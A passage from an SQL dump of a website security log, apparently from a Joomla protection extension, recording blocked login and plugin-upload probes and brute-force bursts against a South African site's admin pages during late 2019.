15:56:34','192.99.15.141','http://smithandsmith.co.za/wp-login.php','404shield',''),(1379,'2019-10-09 15:57:14','192.99.15.141','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1380,'2019-10-09 15:57:48','192.99.15.141','http://smithandsmith.co.za/wp-login.php','404shield',''),(1381,'2019-10-09 15:59:13','192.99.15.141','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1382,'2019-10-09 16:00:38','192.99.15.141','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1383,'2019-10-09 16:01:18','196.2.15.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(1384,'2019-10-09 16:02:07','196.2.15.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(1385,'2019-10-09 16:02:52','196.2.15.68','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1386,'2019-10-09 16:06:19','192.99.15.141','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1387,'2019-10-11 20:02:32','95.53.244.151','http://smithandsmith.co.za/','sessionshield',''),(1388,'2019-10-13 19:39:57','158.69.248.234','http://smithandsmith.co.za/wp-login.php','404shield',''),(1389,'2019-10-13 19:43:16','158.69.248.234','http://smithandsmith.co.za/wp-login.php','404shield',''),(1390,'2019-10-15 10:23:27','154.223.133.108','http://smithandsmith.co.za/wp-login.php','404shield',''),(1391,'2019-10-15 10:24:27','154.223.133.108','http://smithandsmith.co.za/wp-login.php','404shield',''),(1392,'2019-10-15 10:25:33','154.223.133.108','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1393,'2019-10-15 10:29:20','195.226.249.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(1394,'2019-10-15 10:30:56','195.226.249.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(1395,'2019-10-15 10:32:15','195.226.249.83','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1396,'2019-10-15 23:39:33','95.53.244.151','http://smithandsmith.co.za/','sessionshield',''),(1397,'2019-10-16 08:16:23','81.15.197.82','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1398,'2019-10-16 10:02:10','80.241.210.126','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1399,'2019-10-18 00:04:14','83.68.91.123','http://smithandsmith.co.za/wp-login.php','404shield',''),(1400,'2019-10-19 03:55:15','198.27.70.61','http://smithandsmith.co.za/wp-login.php','404shield',''),(1401,'2019-10-19 03:55:33','198.27.70.61','http://smithandsmith.co.za/wp-login.php','404shield',''),(1402,'2019-10-19 03:57:05','183.181.20.62','http://smithandsmith.co.za/wp-login.php','404shield',''),(1403,'2019-10-19 04:06:58','110.232.64.171','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1404,'2019-10-19 04:07:54','178.254.155.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(1405,'2019-10-19 05:09:22','36.255.87.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(1406,'2019-10-19 05:11:47','95.104.114.50','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1407,'2019-10-19 11:26:04','197.26.52.81','http://smithandsmith.co.za/wp-login.php','404shield',''),(1408,'2019-10-19 15:27:10','198.27.70.61','http://smithandsmith.co.za/wp-login.php','404shield',''),(1409,'2019-10-19 15:32:27','119.82.253.90','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1410,'2019-10-19 16:28:41','91.191.3.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(1411,'2019-10-20 18:30:14','37.229.102.55','http://smithandsmith.co.za/','sessionshield',''),(1412,'2019-10-21 11:54:21','65.60.27.157','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1413,'2019-10-22 15:38:38','81.23.32.47','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1414,'2019-10-22 15:39:57','1.20.229.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(1415,'2019-10-23 02:21:35','116.203.183.59','http://smithandsmith.co.za/wp-admin/install.php','404shield',''),(1416,'2019-10-23 12:02:33','93.113.249.252','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1417,'2019-10-25 09:24:21','37.128.132.156','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1418,'2019-10-25 09:24:23','37.128.132.156','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1419,'2019-10-25 09:24:26','54.37.0.239','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1420,'2019-10-25 09:24:28','54.37.0.239','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1421,'2019-10-25 09:24:30','149.210.152.245','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1422,'2019-10-25 09:24:32','149.210.152.245','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1423,'2019-10-25 09:24:34','176.9.137.10','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1424,'2019-10-25 09:24:36','176.9.137.10','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1425,'2019-10-25 09:24:38','89.163.143.27','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1426,'2019-10-25 09:24:40','89.163.143.27','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1427,'2019-10-25 09:24:43','185.50.197.96','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1428,'2019-10-25 09:24:45','185.50.197.96','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1429,'2019-10-25 09:24:47','163.172.12.57','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1430,'2019-10-25 09:24:49','163.172.12.57','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1431,'2019-10-25 09:24:51','80.84.235.26','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1432,'2019-10-25 09:24:53','80.84.235.26','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1433,'2019-10-25 09:24:55','194.135.82.12','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1434,'2019-10-25 09:24:58','194.135.82.12','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1435,'2019-10-25 09:25:04','149.56.82.81','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1436,'2019-10-25 09:25:07','149.56.82.81','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1437,'2019-10-25 09:25:08','5.135.184.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1438,'2019-10-25 09:25:10','5.135.184.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1439,'2019-10-25 09:25:13','205.186.144.49','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1440,'2019-10-25 09:25:16','205.186.144.49','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1441,'2019-10-25 09:25:18','212.83.151.94','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1442,'2019-10-25 09:25:20','212.83.151.94','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1443,'2019-10-25 09:25:22','188.93.97.4','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1444,'2019-10-25 09:25:24','188.93.97.4','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1445,'2019-10-25 09:25:26','91.228.89.25','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1446,'2019-10-25 09:25:28','91.228.89.25','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1447,'2019-10-25 09:25:30','198.50.176.98','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1448,'2019-10-25 09:25:32','198.50.176.98','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1449,'2019-10-25 09:25:35','81.201.63.13','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1450,'2019-10-25 09:25:37','81.201.63.13','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1451,'2019-10-25 09:25:40','149.28.131.99','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1452,'2019-10-25 09:25:43','149.28.131.99','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1453,'2019-10-25 09:25:45','5.135.86.36','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1454,'2019-10-25 09:25:47','5.135.86.36','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1455,'2019-10-25 09:25:49','142.93.251.19','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1456,'2019-10-25 09:25:51','142.93.251.19','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1457,'2019-10-25 09:25:53','91.121.89.77','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1458,'2019-10-25 09:25:55','91.121.89.77','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1459,'2019-10-25 09:25:56','91.192.194.50','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1460,'2019-10-25 09:25:59','91.192.194.50','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1461,'2019-10-25 09:26:01','104.248.0.141','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1462,'2019-10-25 09:26:05','104.248.0.141','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1463,'2019-10-25 09:26:06','94.199.214.90','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1464,'2019-10-25 09:26:08','94.199.214.90','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1465,'2019-10-25 09:26:11','185.209.22.175','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1466,'2019-10-25 09:26:14','185.209.22.175','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1467,'2019-10-25 09:26:19','138.201.55.123','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1468,'2019-10-25 09:26:21','138.201.55.123','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1469,'2019-10-25 09:26:23','173.212.233.184','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1470,'2019-10-25 09:26:25','173.212.233.184','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1471,'2019-10-25 09:26:27','62.210.69.148','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1472,'2019-10-25 09:26:29','62.210.69.148','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1473,'2019-10-25 09:26:31','195.154.29.56','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1474,'2019-10-25 09:26:33','195.154.29.56','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1475,'2019-10-25 09:26:35','207.154.206.21','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1476,'2019-10-25 09:26:37','207.154.206.21','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1477,'2019-10-25 09:26:49','79.137.34.35','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1478,'2019-10-25 09:26:52','79.137.34.35','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1479,'2019-10-25 09:26:54','140.238.165.145','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1480,'2019-10-25 09:26:57','140.238.165.145','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1481,'2019-10-25 09:27:00','165.227.34.86','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1482,'2019-10-25 09:27:03','165.227.34.86','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1483,'2019-10-25 09:27:05','51.255.43.41','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1484,'2019-10-25 09:27:07','51.255.43.41','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1485,'2019-10-25 09:27:10','78.46.73.85','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1486,'2019-10-25 09:27:12','78.46.73.85','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1487,'2019-10-25 09:27:15','109.239.49.162','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1488,'2019-10-25 09:27:17','109.239.49.162','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1489,'2019-10-25 09:27:19','85.214.85.103','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1490,'2019-10-25 09:27:22','85.214.85.103','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1491,'2019-10-25 09:27:24','178.238.228.123','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1492,'2019-10-25 09:27:26','178.238.228.123','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1493,'2019-10-25 09:27:28','145.239.74.157','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1494,'2019-10-25 09:27:31','145.239.74.157','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1495,'2019-10-25 09:27:32','37.247.46.232','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1496,'2019-10-25 09:27:35','37.247.46.232','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1497,'2019-10-25 09:27:37','66.154.67.226','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1498,'2019-10-25 09:27:39','66.154.67.226','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1499,'2019-10-25 09:27:41','37.187.252.140','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1500,'2019-10-25 09:27:43','37.187.252.140','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1501,'2019-10-25 09:27:46','191.252.110.49','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1502,'2019-10-25 09:27:49','191.252.110.49','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1503,'2019-10-25 09:27:51','89.252.178.84','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1504,'2019-10-25 09:27:54','89.252.178.84','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1505,'2019-10-25 09:27:56','178.79.153.183','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1506,'2019-10-25 09:27:58','178.79.153.183','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1507,'2019-10-25 09:28:01','54.37.154.239','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1508,'2019-10-25 09:28:05','54.37.154.239','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1509,'2019-10-25 09:28:07','104.152.108.234','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1510,'2019-10-25 09:28:10','104.152.108.234','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1511,'2019-10-25 09:28:12','149.202.49.181','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1512,'2019-10-25 09:28:14','149.202.49.181','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1513,'2019-10-25 09:28:17','35.168.82.17','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1514,'2019-10-25 09:28:19','35.168.82.17','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1515,'2019-10-25 22:36:10','93.113.249.252','http://smithandsmith.co.za/','sessionshield',''),(1516,'2019-10-26 02:36:31','193.58.111.6','http://smithandsmith.co.za/wp-login.php','404shield',''),(1517,'2019-10-27 19:47:32','84.232.253.81','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1518,'2019-10-27 21:25:04','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1519,'2019-10-27 21:26:59','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1520,'2019-10-27 21:34:17','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1521,'2019-10-28 09:18:19','171.6.163.76','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1522,'2019-10-29 18:38:05','186.136.80.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(1523,'2019-10-30 09:28:30','105.186.119.203','http://smithandsmith.co.za/wp-login.php','404shield',''),(1524,'2019-10-30 17:41:44','194.150.117.29','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1525,'2019-10-31 21:04:05','181.214.9.12','http://smithandsmith.co.za/wp-login.php','404shield',''),(1526,'2019-11-01 14:39:27','213.172.156.35','http://smithandsmith.co.za/wp-login.php','404shield',''),(1527,'2019-11-01 14:52:46','79.104.197.58','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1528,'2019-11-01 16:56:35','45.171.145.3','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1529,'2019-11-01 16:57:05','118.174.165.185','http://smithandsmith.co.za/wp-login.php','404shield',''),(1530,'2019-11-01 16:59:19','183.89.61.238','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1531,'2019-11-01 16:59:38','113.53.149.153','https://smithandsmith.co.za/wp-login.php','404shield',''),(1532,'2019-11-01 16:59:50','113.53.149.153','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1533,'2019-11-01 16:59:58','116.58.226.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(1534,'2019-11-01 17:00:02','116.58.226.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(1535,'2019-11-01 17:00:03','116.58.226.245','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1536,'2019-11-01 21:09:36','116.50.169.189','http://smithandsmith.co.za/wp-login.php','404shield',''),(1537,'2019-11-01 21:09:49','116.50.169.189','http://smithandsmith.co.za/wp-login.php','404shield',''),(1538,'2019-11-01 21:10:05','116.50.169.189','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1539,'2019-11-02 03:31:57','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1540,'2019-11-02 03:32:00','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1541,'2019-11-02 03:32:02','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1542,'2019-11-03 05:02:33','103.82.235.2','http://smithandsmith.co.za/wp-content/themes/satoshi/upload-file.php','404shield',''),(1543,'2019-11-03 14:27:09','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1544,'2019-11-03 14:27:11','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1545,'2019-11-03 14:27:13','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1546,'2019-11-04 05:42:30','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1547,'2019-11-04 05:42:32','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1548,'2019-11-04 17:58:42','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1549,'2019-11-04 17:58:45','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1550,'2019-11-05 12:20:38','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1551,'2019-11-05 12:20:40','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1552,'2019-11-05 12:20:42','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1553,'2019-11-06 09:59:48','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1554,'2019-11-06 09:59:50','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1555,'2019-11-07 04:57:59','194.61.24.94','http://smithandsmith.co.za/wp-admin/admin-ajax.php?action=hotel_booking_dismiss_notice','404shield',''),(1556,'2019-11-07 10:01:42','117.212.89.185','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1557,'2019-11-07 10:02:39','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1558,'2019-11-07 10:03:42','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1559,'2019-11-07 10:04:34','61.90.77.241','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1560,'2019-11-07 10:05:30','109.200.163.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(1561,'2019-11-07 10:06:41','109.200.163.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(1562,'2019-11-07 10:06:45','109.200.163.5','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1563,'2019-11-07 10:06:56','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1564,'2019-11-07 10:07:06','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1565,'2019-11-07 11:27:00','14.207.96.85','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1566,'2019-11-07 11:28:25','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1567,'2019-11-07 11:29:43','198.27.70.61','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1568,'2019-11-07 11:44:04','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1569,'2019-11-07 11:44:24','198.27.70.61','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1570,'2019-11-07 19:39:06','82.78.189.130','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1571,'2019-11-07 19:39:48','86.109.170.183','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1572,'2019-11-07 22:36:35','91.134.137.121','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1573,'2019-11-07 22:36:38','91.134.137.121','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1574,'2019-11-07 22:36:40','88.198.44.23','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1575,'2019-11-07 22:36:43','88.198.44.23','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1576,'2019-11-07 22:36:46','173.236.241.123','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1577,'2019-11-07 22:36:49','173.236.241.123','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1578,'2019-11-07 22:36:51','75.119.212.149','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1579,'2019-11-07 22:36:54','75.119.212.149','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1580,'2019-11-07 22:36:57','91.121.171.149','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1581,'2019-11-07 22:36:59','91.121.171.149','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1582,'2019-11-07 22:37:03','151.80.43.210','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1583,'2019-11-07 22:37:06','151.80.43.210','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1584,'2019-11-07 22:37:09','151.80.141.106','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1585,'2019-11-07 22:37:12','151.80.141.106','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1586,'2019-11-07 22:37:17','75.119.197.100','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1587,'2019-11-07 22:37:20','75.119.197.100','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1588,'2019-11-07 22:37:23','185.8.165.217','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1589,'2019-11-07 22:37:26','185.8.165.217','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1590,'2019-11-07 22:37:28','64.111.103.24','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1591,'2019-11-07 22:37:31','64.111.103.24','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1592,'2019-11-07 22:37:34','213.239.241.141','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1593,'2019-11-07 22:37:37','213.239.241.141','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1594,'2019-11-07 22:37:39','185.137.168.172','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1595,'2019-11-07 22:37:42','185.137.168.172','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1596,'2019-11-07 22:37:47','91.210.225.22','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1597,'2019-11-07 22:37:50','91.210.225.22','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1598,'2019-11-07 22:37:56','139.59.231.1','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1599,'2019-11-07 22:38:01','139.59.231.1','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1600,'2019-11-07 22:38:05','188.166.185.134','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1601,'2019-11-07 22:38:09','188.166.185.134','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1602,'2019-11-07 22:38:12','80.241.50.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1603,'2019-11-07 22:38:15','80.241.50.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1604,'2019-11-07 22:38:19','94.130.204.67','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1605,'2019-11-07 22:38:22','94.130.204.67','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1606,'2019-11-07 22:38:24','93.90.188.44','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1607,'2019-11-07 22:38:27','93.90.188.44','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1608,'2019-11-07 22:38:34','51.38.51.89','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1609,'2019-11-07 22:38:37','51.38.51.89','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1610,'2019-11-07 22:38:40','188.68.52.209','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1611,'2019-11-07 22:38:43','188.68.52.209','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1612,'2019-11-07 22:38:46','149.202.62.118','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1613,'2019-11-07 22:38:49','149.202.62.118','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1614,'2019-11-07 22:38:51','212.232.27.185','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1615,'2019-11-07 22:38:54','212.232.27.185','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1616,'2019-11-07 22:38:56','151.80.29.98','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1617,'2019-11-07 22:38:59','151.80.29.98','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1618,'2019-11-07 22:39:01','173.236.240.145','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1619,'2019-11-07 22:39:06','173.236.240.145','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1620,'2019-11-07 22:39:08','104.131.72.246','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1621,'2019-11-07 22:39:11','104.131.72.246','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1622,'2019-11-07 22:39:13','164.132.224.132','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1623,'2019-11-07 22:39:16','164.132.224.132','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1624,'2019-11-07 22:39:24','37.59.42.192','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1625,'2019-11-07 22:39:26','37.59.42.192','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1626,'2019-11-07 22:39:29','47.89.249.147','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1627,'2019-11-07 22:39:33','47.89.249.147','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1628,'2019-11-07 22:39:37','198.71.240.36','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1629,'2019-11-07 22:39:40','198.71.240.36','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1630,'2019-11-07 22:39:43','208.97.171.59','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1631,'2019-11-07 22:39:46','208.97.171.59','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1632,'2019-11-07 22:39:48','172.104.142.154','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1633,'2019-11-07 22:39:52','172.104.142.154','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1634,'2019-11-07 22:39:54','188.132.190.46','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1635,'2019-11-07 22:39:58','188.132.190.46','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1636,'2019-11-07 22:40:01','51.255.15.193','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1637,'2019-11-07 22:40:05','51.255.15.193','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1638,'2019-11-07 22:40:10','173.212.248.58','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1639,'2019-11-07 22:40:13','173.212.248.58','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1640,'2019-11-07 22:40:16','51.254.39.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1641,'2019-11-07 22:40:20','51.254.39.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1642,'2019-11-07 22:40:24','198.71.240.36','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1643,'2019-11-07 22:40:29','132.148.156.136','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1644,'2019-11-07 22:40:33','132.148.156.136','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1645,'2019-11-07 22:40:36','91.121.93.25','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1646,'2019-11-07 22:40:39','91.121.93.25','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1647,'2019-11-08 02:07:31','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1648,'2019-11-08 13:37:09','183.89.13.163','http://smithandsmith.co.za/wp-login.php','404shield',''),(1649,'2019-11-08 13:39:35','183.89.13.163','http://smithandsmith.co.za/wp-login.php','404shield',''),(1650,'2019-11-08 